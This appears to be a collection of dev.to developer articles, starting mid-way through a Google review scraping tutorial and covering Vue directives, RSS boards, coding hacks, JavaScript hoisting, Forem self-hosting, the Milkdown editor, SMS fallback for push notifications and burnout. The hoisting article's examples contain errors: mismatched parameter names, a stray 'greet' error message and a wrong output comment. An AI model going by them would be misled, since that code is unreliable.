I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
----------------------------------------------------
All reviews:
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
Waste of money, google removed key features just to put them in cheaper next gen phones.
1
February 3, 2021
One of the worst phones i have ever owned. Getting rid of the fingerprint scanner was a big mistake with this phone. The face unlock is such a stupid feature, and unnecessary when people already expect and like the fingerprint scan. The battery life is abysmal. My phone doesnt last even for 1 whole day with light usage. I have an iphone 8 plus for work and that phone has a great battery life even though it is much, much much older. That iphone lasts for 3 days with regular use, and a full day if i am streaming videos all day. The photos on the pixel are okay, i dont like that it applies a ton of blurring to faces. It will blue the heck out of your face to smooth everything and i dont like that. My selfies dont even look like me. And the night photos were the main draw, but ... More
sarahlikesglitter · Review provided by Google
Please Bring Back Fingerprint Scanner
3
December 28, 2020
Like another user said, face recognition is just not as good as a fingerprint scanner. With my fingerprint, I can unlock the phone whenever I'm holding it, no matter what position. With face recognition is has to be right up to my face. It's such a pain, and now that we're wearing masks all the time, it's really a problem. If there's low lighting, it also can't see me. As someone who was a fan of the Huawei Mate before the company was banned from the US, I'm glad the Pixel finally has an Ultra/Extreme Battery Saving mode. That was one of my favorite features as someone who always has low battery because I'm always on my phone. The latest update made the phone worse in my opinion. At first, the Messenger bumbles were messing up, but they fixed that. Now, every time I try ... More
Shan Howard · Review provided by Google
I wanted an upgrade but I was taken back to 2000.
...
Other reviews..
'''
```
You can go even further by applying `Selenium` that will click on *More reviews* button until there's nothing to click on in order to extract all review results.
______________________
### Using [Google Product Result API](https://serpapi.com/product-result)
SerpApi is a paid API with a free plan.
The difference I like the most is that it comes with structured `JSON` output and all you have to do is just to iterate over it.
Besides that, if you want to done things quickly, API is a way to go since you don't have to build everything from scratch by searching the right `CSS` selector or something else.
```python
import json
from serpapi import GoogleSearch
params = {
"api_key": "YOUR_API_KEY",
"engine": "google_product",
"product_id": "14506091995175728218",
"gl": "us",
"hl": "en"
}
search = GoogleSearch(params)
results = search.get_dict()
title = results['product_results']['title']
prices = results['product_results']['prices']
reviews = results['product_results']['reviews']
rating = results['product_results']['rating']
extensions = results['product_results']['extensions']
description = results['product_results']['description']
user_reviews = results['product_results']['reviews']
reviews_results = results['reviews_results']['ratings']
print(f'{title}\n{prices}\n{reviews}\n{rating}\n{extensions}\n{description}\n{user_reviews}\n{reviews_results}')
----------------
'''
Google Pixel 4 White 64 GB, Unlocked
['$199.99', '$198.00', '$460.00']
629
3.9
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7″', 'Facial Recognition', '8 MP front camera', 'Smartphone', 'With Wireless Charging', 'Unlocked']
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice. The new Google Assistant is the easiest way to send texts, share photos, and more. A new way to control your phone. Quick Gestures let you skip songs and silence calls – just by waving your hand above the screen. End the robocalls. With Call Screen, the Google Assistant helps you proactively filter our spam before your phone ever rings.
629
[{'stars': 1, 'amount': 92}, {'stars': 2, 'amount': 33}, {'stars': 3, 'amount': 53}, {'stars': 4, 'amount': 90}, {'stars': 5, 'amount': 361}]
'''
```
You can also extract more reviews results using SerpApi by simply adding `reviews` parameter to `params` `dictionary`, e.g. `"reviews": "1"`, which by default is `0` (**OFF**) and `1` (**ON**).

### Links
[Code in the online IDE](https://replit.com/@DimitryZub1/Scrape-Google-Shopping-Product-Result-python#main.py) • [Google Product Result API](https://serpapi.com/product-result)
### Outro
If you have any questions or something isn't working correctly or you want to write something else, feel free to drop a comment in the comment section or via Twitter at [@serp_api](https://twitter.com/serp_api).
Yours,
Dimitry, and the rest of SerpApi Team.
<img width="100%" style="width:100%" src="https://media.giphy.com/media/S2lenTmOxOAWA/giphy.gif"> | dmitryzub |
752,837 | Rendering HTML code in Vue | Let us suppose that we want to pass to the page as an attribute, a variable containing html code.... | 13,492 | 2021-07-07T20:08:30 | https://dev.to/mattiatoselli/rendering-html-code-in-vue-dan | vue, html, javascript, webdev | Let us suppose that we want to pass to the page as an attribute, a variable containing html code.
Like a clickable link. Following the previous tutorials one could think this is the right way.
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- importing vue js dev library -->
<!-- development version, includes helpful console warnings -->
<script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<title>My vue Test</title>
</head>
<body>
<div id="app">
<a href="{{ link }}">This is the link</a>
</div>
<script type="text/javascript">
var app = new Vue({
el: '#app',
data: {
link: 'https://www.google.com' //this is the link
}
})
</script>
</body>
</html>
```
Actually this will lead to an error. Vue is unable to link the value of the attribute. In order to accomplish the task, we have to use the bind directive.
```HTML
<a v-bind:href="link">This is the link</a>
```
For some reason, we may want to render html code instead of just saving the link in the data key of the vue instance and injecting it in the anchor tag, Vue provides the "v-html" directive.
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- importing vue js dev library -->
<!-- development version, includes helpful console warnings -->
<script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<title>My vue Test</title>
</head>
<body>
<div id="app">
<p v-html="link"></p>
</div>
<script type="text/javascript">
var app = new Vue({
el: '#app',
data: {
link: '<a href="https://www.google.com">This is the link</a>' //this is the link
}
})
</script>
</body>
</html>
``` | mattiatoselli |
753,012 | Knowledge curation and sharing made easy through Weavr Boards and RSS Feeds | Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs. | 0 | 2021-07-12T06:19:45 | https://dev.to/weavr/knowledge-curation-and-sharing-made-easy-through-weavr-boards-and-rss-feeds-29m1 | rssfeed, contentcuration, weavr, newsaggregator | ---
title: Knowledge curation and sharing made easy through Weavr Boards and RSS Feeds
published: true
description: Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs.
tags: rssfeed, contentcuration, weavr, newsaggregator
//cover_image: https://direct_url_to_image.jpg
---
Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs.
Weavr Boards lets you curate and organize content from various external sources into one place.
Now you can also attach an RSS Feed to a board, that will pin any new content from that feed to your board.
You can choose to make your board Private or Public so others can also follow it.

Once your board is created, you can edit the Board settings to include one or more RSS feeds for it to track.

Things you can do with the content in your board.
1. Share selected posts in your Slack channel
2. Create an email newsletter
3. Get the markdown content for the board that you can add to Github Repository
4. You can also add one or more Call to Actions on your board

Check out and follow [Ringcentral's developer content](https://weavr.cafe/ringcentraldevs/board/ringcentral-developer-blogs) created using the above RSS feeds feature.

Sign up on [Weavr.cafe](http://weavr.cafe) today to create your own Weavr Board. | onzalis |
753,157 | Hacks Are Fine | There's a slight problem with the standard definition of a hack. It says more about why you wouldn't want to use one than why you might. What if—now hear me out—hacks are fine? | 0 | 2021-07-09T01:40:47 | https://matthogg.fyi/hacks-are-fine/ | webdev, career, motivation, watercooler | ---
title: Hacks Are Fine
published: true
date: 2021-07-08 00:00:00 UTC
tags: webdev,career,motivation,watercooler
canonical_url: https://matthogg.fyi/hacks-are-fine/
description: There's a slight problem with the standard definition of a hack. It says more about why you wouldn't want to use one than why you might. What if—now hear me out—hacks are fine?
---
_This essay has been adapted from a lightning talk that I originally presented to coworkers in 2019. It was intended as an absurd, tongue-in-cheek thought experiment, but I'd like to think there could possibly be some truth to it..._
There's a slight problem with the standard definition of a hack. It says more about why you _wouldn't_ want to use one than why you _might_. What if—now hear me out—hacks are fine?
A "hack" (also known as a "kludge") is [defined by Wikipedia](https://en.wikipedia.org/wiki/Kludge#Computer_science) as:
> A solution to a problem, the performance of a task, or a system fix which is inefficient, inelegant ("hacky"), or even incomprehensible, but which somehow works.
A definition like this will prime readers a certain way by using more negative words than positive. Also, that little bit of bewilderment at the very end really gets me—_somehow_ hacks work!?! Gosh! My goodness!
So, let's consider several reasons why we maybe shouldn't be surprised by hacks as viable, successful solutions.
## Excitement
Hacks can be exciting! Nobody wants a protagonist who has all the time and resources they need at their disposal. That's not good storytelling. Just ask MacGyver here.
{% youtube EKyCh_WuV6M %}
Now, I'm only half-joking. You could find yourself working for a company, or on a particular project, where you don't have all of the resources or support you'll need to be effective.
This will force you to get creative and think outside the box. And after a few such challenges in your career, you'll be a better developer because of it.
## Pragmatism
When it comes to prototypes, A/B tests, and confirming hypotheses about your product the best way to effectively deliver is actually by writing the fastest, shittiest code you can.
And sometimes you just have to _ship it_, even for production code. There's often a deadline, at which point nobody really cares that you're a code poet. A hack could be the path of least resistance.
A certain amount of technical or product debt isn't, in and of itself, a bad thing. It's an _artifact_ of a decision that was made to get to an end result. It's evidence of a compromise that was made, or a trade-off that (I hope!) was carefully weighed.
How you track that debt and pay it down is another question, of course...
## Critical Thinking
Speaking of trade-offs, hacks are an opportunity for critical thinking. A responsible hack means you've considered things like cost versus benefit or risk versus reward. This is actually a very important learned skill over time.
At the very least, in the short-term a hack might shake loose the ideal solution to a problem you've been struggling with all day. You'll think about it when you go home that evening and maybe even lose some sleep over it. But, in mulling over the hack you'd really prefer to avoid in the morning, you just might come back with a better solution!
## YAGNI
You also need to consider the likelihood that You Aren't Gonna Need It (a.k.a. [YAGNI](https://martinfowler.com/bliki/Yagni.html)). A simpler solution is almost always the better solution, if you can pull it off. Sometimes that might feel like a hack.
I can't be sure, but I think Ron Jeffries might be [against premature implementation](https://ronjeffries.com/xprog/articles/practices/pracnotneed/):
> Resist that impulse, every time. Always implement things when you actually need them, never when you just foresee that you need them.

Trying to predict the future of your code is ambitious. The odds are low that you'll end up being correct. So, it might be more prudent to hedge your bets with a conservative stop-gap measure that costs you less up front.
## Impermanence
In a similar vein, very little of your hard work will live forever. Software can have a very short shelf life whether it's due to redesigns, refactors, business closures or acquisitions, startup pivots, and so on.
I once did some quick math on a napkin and surveyed my previous 9 jobs going all the way back to the late 90s. It's probable that only about 20% of anything I'd ever worked on still existed. Obviously, output from my very first job is gone—so long, [Coldfusion](https://en.wikipedia.org/wiki/Adobe_ColdFusion)!—but so is stuff I worked on just a few years before.
The point being, if perhaps there's a hack in production that you're _really_ not proud of you might not have to worry for very long!
## Durability
On the other hand, your hack could last a lifetime.
If that hacky code is working and delivering value then [you've created legacy code](https://matthogg.fyi/legacy-code-may-be-the-friend-we-havent-met-yet/). Congratulations!
But if that hack doesn't work perfectly, well, I still wouldn't worry much. We can all think of that bug, maintenance task, or tech debt issue that sits in a Jira backlog for months or even years, right? A codebase will always have issues that ultimately never get looked at, which raises the question: _if you never fix it, was it ever broken?_
{% twitter 501718937420455937 %}
For instance, I can tell you that one of Canada's most popular websites contains a self-identified hack that's been executed by hundreds of thousands of visitors daily for at least 7 years and counting.
For fun, I recommend searching for terms like `hack` or `FIXME` hidden in the comments of your codebases and see what you find.
## It's Not Just Software
Speaking of durable hacks, we can broaden the original defintion beyond just software. We're surrounded by _many_ hacks which we take for granted every day.
Advances in science and engineering often progress by way of hacks. The Apollo moon landings are a great example—to get to the moon we literally _threw away an entire Saturn V rocket every time_. Oh, and if you expected to come home you had to crash a tiny module into the ocean and be rescued. And yet, there are footprints on the moon!
And let's not forget what a central processing unit (CPU) truly is:
{% twitter 841802094361235456 %}
The scientific theory of evolution by natural selection is the ultimate hack. Evolution does not prematurely optimize! Natural selection works with whatever's at hand and the smallest change that works well enough is the winner. You, reading this right now, are the result of an innumerable series of tiny hacks.
That said, the human body is still a hot mess:
- Our eyes are wired backwards.
- Our spines were never meant to be vertical.
- We put food and air down the same hole.
And then there's childbirth. The pelvis and birth canal are narrow because we grew to enjoy walking on 2 feet. However, our brains are also big and, like, really smart. So, babies come out when they do because their heads wouldn't fit if they waited any longer! Babies also have soft skulls to facilitate this, and can only come out head-first and facing backwards. Consequently, newborns still develop as if they're in the womb—the so-called 4th trimester.
## OK, OK, But The Software!
Sorry! That was a bit of a tangent.
If you employ a hack, don't be so ashamed. Don't be too proud, either. Above all, don't be lazy—be certain and deliberate about _why_ you're using a hack. Remember there are times you shouldn't use a hack (i.e., extending or tacking onto an existing hack).
If you discover a hack, try to reserve judgement. Consider why it might be there... Is the developer going for a moon shot? Do they think they're MacGyver? Is YAGNI a consideration? Use the hack as an opportunity for dialogue and empathic code review.
So, I guess I'm ultimately pleading for ambivalence and nuance—hacks can be evil, lazy, clever, useful, or anything in between. Hacks are just... fine. But since hacks are all around us, and constantly so, it's to our benefit to accept their utility and consider them an essential skill in any developer's bag of tricks. Maybe.
<small>Images, in order of appearance, are courtesy of [xkcd](https://xkcd.com/974/).</small> | mrmatthogg |
753,528 | Game Development Course Announcement - Become a Game Developer Without a Degree | Farhan Aqeel
| https://www.youtube.com/watch?v=4_92hSf0dJY&list=PLBh8phtAyHPUY9fqgs1w6aHJALJ3_fMSc How to... | 0 | 2021-07-08T10:18:37 | https://dev.to/geeksread/game-development-course-announcement-become-a-game-developer-without-a-degree-farhan-aqeel-2jl2 | gamedev, unity3d, csharp | https://www.youtube.com/watch?v=4_92hSf0dJY&list=PLBh8phtAyHPUY9fqgs1w6aHJALJ3_fMSc
How to Become a Game Developer Without a degree? in this video, I have some things to say about my upcoming series that will help you to become a game developer without a degree. In this game development course, I will start from the very basic and will move to intermediate topics that will help you to become a game developer that can earn money through freelancing websites such as Upwork, Fiverr, freelancer, and other freelancing platforms. Freelancer game development has a wide scope on freelancing markets. you will be able to get game development projects on freelancing websites such as Fiverr, Upwork, and Freelancer. in this game development course, we will look at C# (the programming language that is being used in unity3d game development. this will be the first game development course in Pakistan that will be free and has a level of any top-class game development course offered online.
My plans?
After getting many queries about freelancing, I have started a web series in which I'll teach what and how to work online. if you think that this series may provide benefit then don't forget to share it in your circle.
Youtube: https://www.youtube.com/farhanaqeel
Facebook group: https://www.facebook.com/groups/Freel...
Facebook:https://www.facebook.com/FreelanceTea...
Instagram: https://www.instagram.com/farhan.aqeel
Website: https://www.geeksread.com/ | geeksread |
753,533 | Understand Hoisting in JavaScript once and for all | What is Hoisting? Hoisting is a JavaScript behavior in which a function or variable can be... | 0 | 2021-07-08T11:10:29 | https://dev.to/amarjits/understand-hoisting-in-javascript-once-and-for-all-31o6 | javascript, webdev, tutorial, codenewbie | #What is Hoisting?
Hoisting is a JavaScript behavior in which a function or variable can be used before declaring it. JavaScript moves the function and variable declarations to the top of their scope just before executing it, Due to which we can access them even before its declarations.
Let's understand it by going through some examples.
##Variable Declarations:
### When using `var` keyword :
Below is an example where we have declared a `counter` variable and set its value to 1. However we are trying to `console.log` it before its declaration.
``` javascript
console.log(counter); // undefined
var counter = 1;
```
On executing we get the counter value as `undefined`. This is because JavaScript only hoists `declarations`.
JavaScript hoists the declaration of counter and initializes its value as `undefined`. Therefore, the code looks something like this in the execution phase.
```javascript
var counter;
console.log(counter); // undefined
counter = 1;
```
###When using `let` or `const` keyword :
When using `let` or `const` keywords, JavaScript hoists the declarations to the top but it will not be `initialized`.
```javascript
console.log(counter);
let counter = 1;
```
Therefore when we try to console.log `counter` before initializing it, we will get ReferenceError
```
ReferenceError: Cannot access 'counter' before initialization
```
The same thing happens with the `const` keyword.
## Function Declarations:
Like Variables, JavaScript also hoists function declarations. It means that it moves the function declarations to the top of the script.
```javascript
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
function add(a, b){
return a + b;
}
```
Now the above example won't result in error even though we are calling the `add()` function before defining it.
The code looks something like this during execution:
```javascript
function add(a, b){
return a + b;
}
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
```
###When using an Arrow Function or Anonymous Function:
In the below example we change `add` from a regular function to an anonymous function.
```javascript
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
var add = function(x,y) {
return a + b;
}
```
Now, when JavaScript hoists the declaration of `add` variable it initializes it as `undefined`. Therefore, we get an error like this
```
TypeError: add is not a function
```
Now, You might be wondering what will happen if we use `let` instead of `var`.
```javascript
let x = 5, y = 10;
let result = add(x,y);
console.log(result); // 15
let add = function(x,y) {
return a + b;
}
```
We will get an error again but this time the error message will be different as JavaScript will hoist the declaration of `add` but it will not be initialized.
```
Uncaught ReferenceError: greet is not defined
```
The same thing will happen if we use an Arrow Function because Arrow functions are nothing but syntactic sugar for defining function expressions.
###Some Tips to avoid Hoisting:
* Declaring your variables at the top is always a good rule.
* You can also use Strict Mode.
* In the case of variables, it is better to use `let` than `var`.
Hoisting in JavaScript is an important concept to understand as it might lead to bugs and unexpected behavior in your code.
That's it, I hope you learnt a lot from this blog. If you enjoyed this post, I’d be very grateful if you’d share it. Comment below if you have any doubts or questions.
Thank you for Reading!🙂
| amarjits |
753,599 | Self hosting Forem(Dev) on your VPS; using t2d! | Now you can have your own [dev.to like] community. In this installation process, I use t2d(Talk to... | 8,399 | 2021-07-08T12:23:16 | https://app.leewardslope.com/morty/self-hosting-forem-on-your-vps-1d21 | selfhosting, t2d, webdev, tutorial | Now you can have your own [dev.to like] community. In this installation process, I use t2d(Talk to Dokku) a bash script which is powered by whiptail and dokku.
### Forem
Forem is open source software for building communities. It is the open source software that powers DEV and other inclusive communities; including [my own community](https://app.leewardslope.com)
Other Communities which are using Forem: https://www.forem.com/discover/
### t2d
t2d aka Talk to Dokku; is a Terminal User Interface(TUI) powered by dokku and whiptail. With t2d you will be able to deploy apps in most popular programming languages, link them to most popular databases and all that with almost zero configuration from your side. Apart from all these amazing features it will also save you money along the way.
For more info [Click Here](https://github.com/akhil-naidu/t2d)
## Demonstrating Forem Installation using t2d
{% youtube m4jm2ZOA9bg %}
## Screen Shots of t2d v2.1






Press "Enter", to automate the Dokku installation. More information can be seen in the video above.
---
Once the installation was done, sometimes you need to update your ENV variables or Update your entire Forem instance with the latest changes.
You can also use t2d for post deploy configuration. Right now, I added only few very necessary options. This section of the t2d will update daily.



## Repository
{% github akhil-naidu/t2d %}
| akhilnaidu |
754,008 | Introducing Milkdown: A plugin driven WYSIWYG markdown editor | Overview Milkdown is a lightweight but powerful WYSIWYG markdown editor. It's made up by... | 0 | 2021-07-08T18:46:29 | https://dev.to/saulmirone/introducing-milkdown-a-plugin-driven-wysiwyg-markdown-editor-17n7 | showdev, javascript, typescript, markdown | ## Overview
Milkdown is a lightweight but powerful WYSIWYG markdown editor. It's made up by two parts:
- A tiny core which provide markdown parser, serializer and kinds of plugin loader.
- Lots of plugins provide syntax, commands and components.
With this pattern you can enable or disable any custom syntax you like, such as table, latex and slash commands.
You can even create your own plugin to support your awesome idea.
---
## Links
- [online editor](https://saul-mirone.github.io/milkdown/#/online-demo)
- [documentation](https://saul-mirone.github.io/milkdown/)
- [github](https://github.com/Saul-Mirone/milkdown)
## Features
- 📝 **WYSIWYG Markdown** - Write markdown in an elegant way
- 🎨 **Themable** - Theme can be shared and used with npm packages
- 🎮 **Hackable** - Support your awesome idea by plugin
- 🦾 **Reliable** - Built on top of [prosemirror](https://prosemirror.net/) and [remark](https://github.com/remarkjs/remark)
- ⚡️ **Slash & Tooltip** - Write fast for everyone, driven by plugin
- 🧮 **Math** - LaTeX math equations support, driven by plugin
- 📊 **Table** - Table support with fluent ui, driven by plugin
## Tech Stack
Milkdown is built on top of these tools:
- [Prosemirror](https://prosemirror.net/) and it's community - A toolkit for building rich-text editors on the web
- [Remark](https://github.com/remarkjs/remark) and it's community - Markdown parser done right
- [Postcss](https://postcss.org/) - Powerful css tool to build theme
- [TypeScript](https://www.typescriptlang.org/) - Developed by typescript
- [Prism](https://prismjs.com/) - Code snippets support
- [Katex](https://katex.org/) - LaTex math rendering
---
## First editor
We have some pieces for you to create a very minimal editor:
> **We use [material icon](https://fonts.google.com/icons) and [Roboto Font](https://fonts.google.com/specimen/Roboto) in our theme**.
> Make sure to include them for having the best experience.
```typescript
import { Editor } from '@milkdown/core';
import { commonmark } from '@milkdown/preset-commonmark';
// import theme
import '@milkdown/theme-nord/lib/theme.css';
const root = document.body;
new Editor({ root }).use(commonmark).create();
```
---
For further information, please visit our [website](https://saul-mirone.github.io/milkdown/). | saulmirone |
754,058 | Using SMS as a Fallback Option for Push Notifications | Using SMS as a fallback communication channel for users who are not subscribed to push... | 0 | 2021-07-12T18:53:54 | https://onesignal.com/blog/using-sms-as-a-fallback-option-for-unsubscribed-push-users/ | javascript, react, nextjs, webdev | ---
title: Using SMS as a Fallback Option for Push Notifications
published: true
date: 2021-07-08 18:24:07 UTC
tags: javascript, react, nextjs, webdev
canonical_url: https://onesignal.com/blog/using-sms-as-a-fallback-option-for-unsubscribed-push-users/
---

Using SMS as a fallback communication channel for users who are not subscribed to push notifications can help you reach a larger portion of your audience while respecting their communication preferences.
For example, a coffee company may use mobile push notifications to let customers know when their order is ready for pickup. To deliver a seamless customer experience for all patrons, they could set up SMS as a fallback communication channel in the event that a customer is not subscribed to push notifications. Doing so will ensure that more customers receive order pickup alerts and also creates a more inclusive and customer-centric brand experience.
This 5-step guide will demonstrate how to compose OneSignal Web Push SDK with the OneSignal Rest API to enable SMS for users who are not subscribed to push notifications on your site. This example is based on the [OneSignal + Next.js integration sample app](https://github.com/OneSignalDevelopers/OneSignal-Nextjs-Sample). All of the components needed to implement this use case can be implemented using any web technology and are not limited to Next.js and React.
This guide assumes that you have already configured the [OneSignal Twilio integration](https://documentation.onesignal.com/docs/sms-quickstart).
## 1. Check if the current user has subscribed to push notifications
The OneSignal Web Push SDK provides an asynchronous function, known as [isPushNotificationEnabledCallBack](https://documentation.onesignal.com/docs/web-push-sdk#ispushnotificationsenabled), that returns a boolean value that describes if the current user has push notifications enabled. You’ll call this function on the client once the component mounts to the DOM.

## 2. Tag users who have push notifications disabled
If the user does not have notifications turned on, you'll need to [tag the user](https://documentation.onesignal.com/docs/web-push-sdk#sendtag) with some metadata to target them via our [Segments](https://documentation.onesignal.com/docs/segmentation) feature.
You can tag users by calling the `sendTag` function made available by our Web Push SDK. The tag name is arbitrary, so I’m using `subscribed_to_push` as the tag for this example. You can filter users based on these tag values — something you’ll take advantage of when creating a new audience segment.

To enable an SMS notification as a fallback to push notifications, apply the `subscribed_to_push` tag based on whether or not the user has push notifications enabled.

## 3. Create an API endpoint that creates an SMS
To control when a notification is sent to the user, you'll need to create an API route to request the OneSignal API to send a notification on demand. You can achieve this with the notifications endpoint on the OneSignal API.
To send a text message notification, construct a request with the following shape.
```
{
include_phone_numbers: [“+18001234567”],
name: "Identifier for SMS",
sms_from: "Twilio phone number",
contents: {
en: "English message",
cn: "Chinese message"
}
```
Because I’m using Next.js for this example, I need to add a file to `pages/api` that exports a function that accepts an HTTP request and response object. In this example, I will set up the route to pull the phone number from the request body, but you can look up your users’ phone numbers instead.

## 4. Call the API endpoint that creates an SMS
The final step to enable automatic fallback to SMS notifications is to post a request to the route responsible for creating the notification. I will make this request in the callback passed to `isPushNotificationsEnabled` only when the user does not have push notifications enabled.

A text message will now be sent to the numbers in the request body whenever a user navigates to a page using the OneSignal hook. The phone number is currently hard-coded for demo purposes; you may need to get the number from the app state or perform a server-side lookup for the user’s account information if your site requires that user’s login.
## 5. Push an SMS to the segment of users who are not subscribed to push notifications
To support sending SMS notifications to all users who have opted out of push notifications, you can create a segment in your OneSignal Dashboard and filter by the tag’s value: `subscribed_to_push`.
The first step to send messages to all users with push notifications disabled is to create a new segment. I’m naming the segment _Opted-out of push notifications_ and filtering by `subscribed_to_push` is `false` and the device type is SMS.

Sending an SMS notification to all users in the segment requires creating a message to send and selecting this new segment as the target.


When you click send, the text message will be sent to everyone in the segment, completing the workflow.
## Other Updates on the Horizon
We are in the process of developing a new push-to-SMS retargeting functionality that will enhance our SMS fallback delivery capabilities. If you're interested in trialing this feature and providing feedback to inform our product roadmap, click the link below to learn more about participating in our Beta Program.
### >> [Learn More About the OneSignal Beta Program](https://onesignal.com/beta-program)
### Additional Support
Have questions or need some support getting started? We're here to help. Reach out to us at **support@onesignal.com** or [login to your OneSignal account](https://app.onesignal.com/login) and send us a message from your dashboard. | iamwillshepherd |
754,345 | Tips To Avoid Developer Burnout Like a Pro | Are you properly handling the stress in your dev life right now? Being stressed out because you have... | 0 | 2021-07-09T05:21:42 | https://dev.to/krowser/tips-to-avoid-developer-burnout-like-a-pro-1n69 | career, productivity, codenewbie | Are you properly handling the stress in your dev life right now?
Being stressed out because you have pending code to write or not being able to stare at your IDE for longer than 10 minutes without tabbing out and browsing the Web — are both symptoms of developer burnout. In other words, you’ve spent so much of your energy coding that you no longer can stand it.
This happens to all of us senior and junior devs alike. It’s the problem of having a job that sometimes is also a hobby. When that happens, you love coding so much that you spend nine hours working on it and then a few extra working on your personal projects.
Don’t worry though — at least not too much — because there are ways to avoid burnout. You just have to understand what you’re going through first.

#What Causes Developer Burnout?
For you to understand how to avoid it, you first need to understand where it comes from. Burnout comes from spending too much energy on a single activity, which in turn affects every other aspect of your life. It’s that simple.
That can be seen in many ways, for instance, making coding the only activity you do your entire day. When you spend 12 to 18 hours a day coding, what else do you have time for? Other than eating and sleeping, I mean?
Or, perhaps only focusing on coding, even when you’re not writing code. Reading about coding, coding techniques, new frameworks, other languages. While you’re not actively writing code when doing any of these things, you’re still only focusing on a single task. Your mind is unable to break from the coding state of mind. Even if you’re not consciously thinking about them, your coding blockers (pending tasks on your daily job, future features you’re trying to implement on your pet project, new frameworks you’ve been dying to learn but haven’t had the time for) are adding to your stress and anxiety.
You can tell yourself you’re doing it for a reason but no matter how noble that reason might be, you’ll end up burning out. Even if your mind resists it, your body will yield. You’ll start seeing physical problems such as losing (or graying) hair, stomach issues, upper back or neck pains due to strained muscles. These are all symptoms burned out developers feel. I know because I’ve felt them myself.
#What Can You Do To Avoid Burnout Then?
Stop coding. That’s the first step.
Not entirely of course, but give yourself a fixed time window in which you’re allowed to code. Then stop.
And by “stop” I mean it. Close your IDE, stop Googling for a solution, and making notes for tomorrow. It’s “you” time now.
I don’t care if you love coding. You are not a code-writing machine, you’re a person, and we humans need more than one thing in our lives. You need interaction with other people or activities that will keep your mind off of coding.

What can you do? Here are a few ideas:
#Play a game
If you’re not a social person, playing games can also help.But, please don't play a game you developed, if not you will get disturbed is there are any bugs in the game play.
Find one that speaks to you and captures your attention, then dive right into it. Mind you, don’t change one burnout for the other, but try to balance your gaming time within your day. Maybe spend one or two hours after work as a way to help your mind make the context switch into not thinking about code anymore.
And if you are a social person, you can still implement gaming with friends (especially now that we’re all isolated) through online gaming. Use voice chat to pretend you’re all sitting together; that also adds a lot to the experience and allows you to have an actual conversation about other people’s interests. It’ll force you to stop thinking about your code and think about something completely different.
#Read a book / Watch a movie
While they’re not the same type of activity, they both contribute in the same way: they take you out of your world and put you into a different one. If you’re more into “not thinking and letting others do the work for you,” then a movie is a great escape ( I personally love watching movies to forget about work problems).
If, on the other hand, you have the time to read a book, then it’ll have the same effect. It’ll take you out of your house and into a completely different world where your problems (and your context) don’t exist. You’ll spend a few hours completely unaware of whatever is causing the burnout. You’ll feel refreshed and re-invigorated once you’ve closed that book for the day.
#Catch up with friends or family
If you can, leave your house. But if you can’t, a video call or even a phone call will do. Talk to other people and actively listen to them. Making a call “because you have to” and then going back to coding will not have any positive effect. Instead, spend some time having a conversation about life, about problems, or about anything that is not work-related. Something as simple as that will help you get your mind off whatever is causing your burnout.
#Take a break
Funny story, I didn’t know how to finish this article, and I had been writing since 4 a.m., so I left for a walk right at this point. It was a beautiful day, so my wife and I went for a walk. We picked up my kids from school, spent some time with them, and in the end, it was too late for me to go back to writing. It’s the next day now, my mind is fresher, and I know how to move forward. I could’ve stressed out about the fact that I couldn’t finish this story yesterday, but instead, I gave myself time. That’s the whole point of taking a break.

#Get off of social media
Look, I get it, I love using Twitter, Clubhouse & LinkedIn, and I’m sure you have your favorite social media platform, but you need to stop using them from time to time. Some people even recommend uninstalling these apps from your mobile devices, so you can remove the notifications-related anxiety from your life. This is great if you notice that your social media activity is 100% related to your burnout. If you’re getting burned out because you have an open source project that’s getting lots of activity online, then your phone is probably buzzing with updates. Stop it. You can’t unplug if you’re constantly reminded about it.

#Remove work-related notifications from your mobile devices
In the same vein as the social media app removal, if it’s work that’s causing your burnout, unplug from it. That means turning off email and slack (or whatever combination you might have) notifications, or even if you have a dedicated work phone, turn it off if you can. If you’re not meant to be working, you should not be looking at work-related notifications. That’s the rule you need to live by.

#It Can Wait
That’s the mantra you need to keep in the back of your mind. That problem you’ve been trying to solve for the past five days? It can wait a few more hours. Take a break. That new release of your framework? It can wait a little longer. Spend some time with your family. That email you started writing three times but got interrupted? It can wait; it’s “you” time. Go read a book.
Once you accept the fact that everything but your health can wait, then taking a break becomes slightly easier.
What are you doing to lower or avoid your own burnout? How are you handling stress during the pandemic? Share your experience with others in the comments.

| krowser |
